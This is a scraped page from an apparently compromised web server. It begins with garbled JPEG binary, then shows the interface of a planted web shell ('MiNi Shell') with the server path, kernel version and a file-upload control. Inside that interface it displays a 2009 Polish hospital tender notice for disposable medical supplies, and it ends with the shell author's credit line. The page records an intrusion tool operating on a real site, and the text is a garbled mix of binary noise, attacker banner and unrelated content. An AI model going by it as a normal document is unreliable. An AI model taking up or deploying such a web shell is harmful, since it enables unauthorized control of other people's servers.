JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090402/57577-N-2009.html

<p class="kh_header"><b>Krasnystaw: PN 07/2009 Dostawa materiałów i sprzętu medycznego jednorazowego użytku dla potrzeb SP ZOZ w Krasnymstawie</b><br>
<b>Numer ogłoszenia: 57577 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie , ul. M. Sobieskiego 4B, 22-300 Krasnystaw, woj. lubelskie, tel. 082 5762170, faks 082 5764901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozkrasnystaw.com</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.spzozkrasnystaw.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samodzielny Publiczny Zespół Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN 07/2009 Dostawa materiałów i sprzętu medycznego jednorazowego użytku dla potrzeb SP ZOZ w Krasnymstawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup materiałów i sprzętu medycznego jednorazowego użytku podzielony na 4 pakiety wraz z dostawą do SP ZOZ w Krasnymstawie. 
2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ. Podane ilości są szacunkowym zapotrzebowaniem na okres 12 miesięcy. Zamawiający zastrzega sobie prawo do rezygnacji z zakupu części asortymentu wynikający z braku zapotrzebowania.
3. Wymagany termin ważności oferowanego produktu wynosi, co najmniej 12 miesięcy od dnia ich dostawy.
4. Wyroby medyczne muszą być dopuszczone do stosowania na zasadach określonych 
w ustawie o  wyrobach medycznych z 24 kwietnia 2004 roku (Dz. U. 93 poz. 896 z 2004 r. z późn. zm.).
5. Zamawiający nie zamierza zwoływać zebrania wykonawców.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0, 33.14.13.10-6, 33.14.13.20-9, 33.14.12.20-8, 33.10.00.00-1, 33.16.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium. Wadium dla całego zamówienia wynosi: 8 400,00 zł (słownie: osiem tysięcy czterysta złotych ), w tym dla poszczególnych części:
Pakiet 1	600,00 zł
Pakiet 2	2 000,00 zł
Pakiet 3	4 000,00 zł
Pakiet 4	1 800,00 zł

W przypadku złożenia oferty częściowej Wykonawca zobowiązany jest wnieść wadium w kwocie określonej dla danej części. W przypadku złożenia oferty na kilka części kwota wadium stanowi sumę wadiów ustalonych dla poszczególnych części zamówienia. Jeżeli wysokość wniesionego wadium będzie niższa niż suma wynikająca z poszczególnych części zamówienia, zamawiający uzna, że wadium nie zostało wniesione w wymaganej wysokości.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
2.1	 pieniądzu,
2.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
2.3	gwarancjach bankowych,
2.4	gwarancjach ubezpieczeniowych, 
2.5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Kredyt Bank S.A Oddział Chełm, Nr rachunku 98 1500 1373 1213 7001 1365 0000 z dopiskiem: Wadium PN 07 2009 Dostawa materiałów i sprzętu medycznego jednorazowego użycia  
4.	Wykonawca powinien złożyć w ofercie dowód wniesienia wadium w przypadku wpłaty przelewem. Terminem wniesienia wadium jest data i czas uznania rachunku Zamawiającego.
5.	W przypadku wniesienia wadium w formach innych niż pieniądzu wykonawca zobowiązany jest dołączyć do oferty gwarancję bądź poręczenie w następujący sposób: kserokopię potwierdzoną za zgodność z oryginałem zszyć, zbindować lub w inny sposób trwale złączyć z ofertą, natomiast oryginał dokumentu należy złożyć wraz z ofertą w taki sposób, aby była możliwość jego zwrócenia bez dekompletowania oferty. W przypadku, gdy oryginał dokumentu będzie zszyty, zbindowany lub w inny sposób trwale złączony z ofertą zamawiający nie dokona jego zwrotu. 
6.	Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
6.1	być wystawione na Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw,
6.2	zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 5 ustawy,
6.3	w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań opisanych w art. 46 ust. 5 ustawy każdego z tych wykonawców,
6.4	okres ważności wadium nie może być krótszy niż okres związania ofertą, przy czym pierwszym dniem ważności zobowiązania jest dzień składania ofert.
7.	Zamawiający zwróci wadium na zasadach określonych w art. 46 ustawy. W przypadku wniesienia wadium w pieniądzu, w ofercie należy podać nazwę, adres banku oraz numer konta, na jakie zamawiający dokonuje zwrotu wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Prawo do ubiegania się o udzielenie zamówienia mają tylko ci Wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia na podstawie złożonych oświadczeń oraz dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VII.	OFERTA POWINNA ZAWIERAĆ NASTĘPUJĄCE DOKUMENTY brak któregokolwiek z poniższych dokumentów lub dokumenty o treści odmiennej od wymaganych spowoduje odrzucenie oferty.
1.	Wypełniony i podpisany FORMULARZ OFERTOWY (Załącznik Nr 1).
2.	Wypełniony i podpisany FORMULARZ CENOWY (Załącznik Nr 2).
Instrukcja postępowania z Formularzem cenowym oferty w wersji elektronicznej:
a)  Zakazuje się wprowadzania jakichkolwiek zmian i modyfikacji otrzymanego załącznika, a w szczególności usuwania komórek lub arkuszy.
b)  Po wypełnieniu formularza należy: 
-	zapisać go na dyskietce ( lub innym nośniku informacji ) jako plik o nazwie nazwa wykonawcy.xls i przekazać Zamawiającemu wraz z ofertą,
-	wydrukować arkusze z częściami na które Wykonawca składa ofertę, podpisać je i złożyć wraz z innymi wymaganymi dokumentami.
3.  Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art. 24 ust.1 i 2 ustawy Pzp   (Załącznik Nr 3).
4.   Zaakceptowany  Wzór umowy sprzedaży (Załącznik Nr 4).
5. Koncesję lub zezwolenie, jeżeli odrębne przepisy wymagają posiadania koncesji lub   zezwolenia na podjęcie działalności w zakresie objętym zamówieniem.
6. Dokumenty potwierdzające dopuszczenie oferowanego produktu do obrotu na terenie Polski, tj. zgłoszenie do rejestru wyrobów medycznych lub deklarację zgodności CE zgodnie  z ustawą 20 kwietnia 2004 r. o wyrobach medycznych.
7.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.	Ewentualne pełnomocnictwo, jeśli uprawnienie do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych przez Wykonawcę.
10.	Dokument potwierdzający wniesienie wadium.

Dokumenty, o których mowa powyżej, powinny być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty wystawione w języku obcym, należy złożyć w formie odpisu, wypisu, wyciągu lub kopii przetłumaczone na język polski, poświadczone przez tłumacza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzozkrasnystaw.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ w Krasnymstawie, ul. M. Sobieskiego 4B, 22-300 Krasnystaw.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:30, miejsce: Kancelaria SP ZOZ w Krasnymstawie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1. RĘKAWICE MEDYCZNE WADIUM 600 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Lateksowe diagnostyczne M	para	70 000
2	Lateksowe diagnostyczne S	para	70 000
3	Lateksowe diagnostyczne L	para	35 000
4	Chirurgiczne sterylne 6,0	para	1 000
5	Chirurgiczne sterylne 6,5	para	1 400
6	Chirurgiczne sterylne 7,0	para	2 100
7	Chirurgiczne sterylne 7,5	para	1 300
8	Chirurgiczne sterylne 8,0	para	1 400
9	Chirurgiczne sterylne 8,5	para	200
10	Rękawice foliowe damskie - opak. 100 szt. opak.	400
11	Rękawice foliowe męskie - opak. 100 szt.	 opak.	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 IGŁY, STRZYKAWKI, PRZYRZĄDY 
WADIUM 2 000 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Przyrząd do przetaczania płynów                                                          Igła biorcza jednokanałowa, komora kroplowa 20 kropli = 1 ml ? 0,1 ml , powierzchnia filtracyjna min. 10 cm2, wielkość oczek filtra do płynów 15 ?, długość drenu min. 150 cm, łącznik do dodatkowej iniekcji z korkiem, rolkowy regulator przepływu, łącznik LUER-LOCK, opakowanie jednostkowe typu blister-pack	szt.	65 000
2	Przyrząd do przetaczania krwi                                                              Igła biorcza jednokanałowa, komora kroplowa 20 kropli = 1 ml ? 0,1 ml, powierzchnia filtracyjna min. 10 cm2, wielkość oczek filtra do krwi 200 ?, długość drenu min. 150 cm, łącznik do dodatkowej iniekcji z korkiem, rolkowy regulator przepływu, łącznik LUER-LOCK, opakowanie jednostkowe typu blister-pack	szt.	6 000
3	Przyrząd do przetaczania płynów światłoczułych	  szt.	1 000
4	Igła jednorazowego użycia 0.5 x 25 mm	szt.	20 000
5	Igła jednorazowego użycia 0.6 x 30 mm	szt.	20 000
6	Igła jednorazowego użycia 0.7 x 30 mm	szt.	80 000
7	Igła jednorazowego użycia 0.8 x 40 mm	szt.	120 000
8	Igła jednorazowego użycia 0.9 x 40 mm	szt.	110 000
9	Igła jednorazowego użycia 1.1 x 40 mm	szt.	110 000
10	Strzykawka jednorazowego użytku do insuliny 1 cm3	szt.	20 000
11	Strzykawka 1 ml tuberkulina                                                        Strzykawka tuberkulinowa jednorazowego użytku, sterylna z dołączoną w zestawie igłą 0,45x13 mm (igła obok strzykawki), skala co 0,05 ml, opakowanie jednostkowe typu Blister- Pack, szczelna z gumowym tłokiem, apirogenna, pakowana pojedynczo.	szt.	10 000
12	Strzykawka jednorazowego użycia 2 ml                                       Strzykawka dwuczęściowa jednorazowego użytku, apirogenna, sterylna, szczelna, tłok w kolorze kontrastującym, granatowa skala idealnie kontrastująca i czytalna, rozszeżona skala do 2,5 ml, płynny przesuw tłoka, zabezpieczenie przed wysunięciem tłoka, pakowana pojedynczo.	szt.	50 000
13	Strzykawka jednorazowego użycia 5 ml                                       Strzykawka dwuczęściowa jednorazowego użytku, apirogenna, sterylna, szczelna, tłok w kolorze kontrastującym, granatowa skala idealnie kontrastująca i czytalna, rozszeżona skala do 5,6 ml, płynny przesuw tłoka, zabezpieczenie przed wysunięciem tłoka, pakowana pojedynczo	szt.	100 000
14	Strzykawka jednorazowego użycia 10 ml                                     Strzykawka dwuczęściowa jednorazowego użytku, apirogenna, sterylna, szczelna, tłok w kolorze kontrastującym, granatowa skala idealnie kontrastująca i czytalna, rozszeżona skala do 12 ml, płynny przesuw tłoka, zabezpieczenie przed wysunięciem tłoka, pakowana pojedynczo	szt.	120 000
15	Strzykawka jednorazowego użycia 20 ml                                     Strzykawka dwuczęściowa jednorazowego użytku, apirogenna, sterylna, szczelna, tłok w kolorze kontrastującym, granatowa skala idealnie kontrastująca i czytalna, rozszeżona skala do 23 ml ml, płynny przesuw tłoka, zabezpieczenie przed wysunięciem tłoka, pakowana pojedynczo 	szt.	80 000
16	Strzykawka jednorazowego użycia 50 ml                                         Strzykawka trzyczęściowa jednorazowego użytku, apirogenna, sterylna, szczelna z końcówka LUER-LOCK z gumowym tłokiem uszczelniającym, widoczna skala pomiarowa, czytelna i trwała skala, opakowanie typy Blister-Pack, pakowana pojedynczo.	szt.	3 000
17	Strzykawka żaneta 100 ml                                                           Strzykawka trzyczęściowa jednorazowego użytku, Janetta 100, do stzrykawki załączana zmienna nasadka LEUR, sterylna, tłok z elastycznym gumowym uszczelnieniemzapewniający płynny przesuw, zabezpieczenie przed wysunięciem tłoka, czytelna i trwała skala, opakowanie typu Blister-Pack, pakowana pojedynczo.	szt.	3 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.13.20-9, 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3. KANIULACJA WADIUM 4 000 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Zestaw do kaniulacji dużych naczyń jednokanałowy zakładany metodą     Selingera	7F	80
2 Zestaw do kaniulacji dużych naczyń dwukanałowy zakładany metodą      Selingera	8F	70
3 Zestaw do kaniulacji dużych naczyń trzykanałowy zakładany metodą       Selingera	8F	150
4 Igła do znieczuleń podpajenczynowych standard	25G 90 mm	800
5 Kranik trójdrożny  3 000
6 Przedłużacz do pompy infuzyjnej Luer Lock 1,5 m 2 000
7 Rampa trójdrożna 600
8 Kateter do odsysania wydzieliny z dróg oddechowych dł. 50 cm	8F	400
9 Kateter do odsysania wydzieliny z dróg oddechowych dł. 60 cm	12F	600
10 Kateter do odsysania wydzieliny z dróg oddechowych dł.60 cm	14F	1 200
11 Kateter do odsysania wydzieliny z dróg oddechowych dł. 60 cm	16F	1 200
12 Kateter do odsysania wydzieliny z dróg oddechowych dł. 60 cm	18F	1 200
13 Kateter do podawania tlenu przez nos wykonany z PVC długość 150 cm	2 000
14 Sonda żołądkowa dł. 100 cm wykonana z PVC medycznej jakości	16F	500
15 Sonda żołądkowa dł. 100 cm wykonana z PVC medycznej jakości	18F	500
16 Kateter dren do odsysania pola operacyjnego z zakrzywioną końcówką dł. katetera 200 cm 2 000
17 Kateter dren do odsysania ran typ Redon wykonany z PVC dł. 70 cm 12F	700
18 Kateter dren do odsysania ran typ Redon wykonany z PVC dł. 70 cm 14F	500
19 Kateter/dren do odsysania ran typ Redon wykonany z PVC dł. 70 cm 16F	500
20 Butelka do długotrwałego odsysania ran	250 ml	1 500
21 Igła Wanga do histologii  igła w igle
-igła wewnętrzna 21G 0,8 mm dł.13 
-igła zewnętrzna 19G 1,0 mm dł.15
22 Zestaw do nefrostomii
-kateter typu pigtail 9F 45 cm
-prowadnik typu Lunderquista .038 J 80 cm
-igła dwuczęściowa 18G 20 cm
-dilatator z rozrywalną koszulką 13F
-dilatatory 7F ,10F i 13F
-kołnierz mocujący z opaską
-strzykawka 10 ml LL
-skalpel
23 Zestaw do szynowania moczowodów typ Pigtail
Prowadnik .035 długość 110 cm
Kateter typ Pigtail podwójnie wygięty 5F
Odstęp między pętlami 24 cm
Średnica pętli pęcherzowej 4 cm
Zacisk, popychacz
24 Zestaw do szynowania moczowodów typ Pigtail
Prowadnik  .038 długość 110 cm
Kateter typ Pigtail podwójnie wygięty 6F
Odstęp między pętlami 24 cm
Średnica pętli pęcherzowej 4 cm
Zacisk, popychacz
25 Koreczek Luer - Lock  3 000
26 Koreczek Luer - Lock - wielorazowego użytku  1 000
27 Kaniula do długotrwałych wlewów dożylnych igła silikonizowana;cewnik wykonany z FEP;kaniula nie zawiera latexu, co jest potwierdzone na każdym pojedynczym opakowaniu kaniuli;na opakowaniu jednostkowym napisy w języku polskim,informacja o rozmiarze kaniuli tj.średnicy,długości oraz przepływie w ml min.	20G	24 000
28 Kaniula do długotrwałych wlewów dożylnych 
igła silikonizowana;cewnik wykonany z FEP;kaniula nie zawiera latexu, co jest potwierdzone na każdym pojedynczym opakowaniu kaniuli;na opakowaniu jednostkowym napisy w języku polskim,informacja o rozmiarze kaniuli tj.średnicy,długości oraz przepływie w ml/min.
29 Kaniula do długotrwałych wlewów dożylnych
igła silikonizowana;cewnik wykonany z FEP;kaniula nie zawiera latexu, co jest potwierdzone na każdym pojedynczym opakowaniu kaniuli;na opakowaniu jednostkowym napisy w języku polskim,informacja o rozmiarze kaniuli tj.średnicy,długości oraz przepływie w ml min.
	24G	6 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4. LAPAROSKOPIA WADIUM 1 800 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Clinch laparoskopwy 5 mm z obrotowym ramieniem, rękojeść z możliwościa blokowania podczas zaciskania szczęk urządzenia, długość ramienia 31-33 cm, długość szczęk 21 mm	szt.	60
2 Grasper laparoskopowy 5 mm z obrotowym ramieniem, rekojeść z możliwością blokowania podczas zaciskania szczęk urządzenia, długość ramienia 31-33 cm	szt.	20
3 Nożyczki laparaoskopowe 5 mm, jednorazowe z obrotowym ramieniem i możliwością podłączenia jednobiegunowej koagulacji, długośc ramienia 31-33 cm, długość ostrza 16 mm.	szt.	20
4 Dissector laparoskopowy 5 mm z obrotowym ramieniem i możliwością podłączenia jednobiegunowej koagulacji długość ramienia 31-33 cm	szt.	20
5 Automatyczna klipsownica laparokopowa 10 mm, z 20 średnio-dużymi klipsami, długośc klipsa po zamknięciu 9 mm.	szt.	60
6 Trokar jednorazowy 5 mm, bezpieczny z płaskim nożem i karbowaną tuleją, radioprzezierny, optyczny wskaźnik położenia ostrza. 	szt.	60
7 Trokar bezpieczny jednorazowy 11 mm ze zintegrowanym systemem redukcyjnym 5-11 mm, karbowaną tuleją i płaskim nożem o długości 9 mm, radioprzezierny, optyczny wskaźnik położenia ostrza. 	szt.	60
8 Siatka polipropylenowa monofilamentowa 8x13 cm i grubości 0,57 mm	szt.	50
9 Siatka polipropylenowa monofilamentowa 15x15 cm i grubości 0,57 mm szt.	100
10 Siatka polipropylenowa monofilamentowa 22x35 cm i grubości 0,57 mm szt.	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com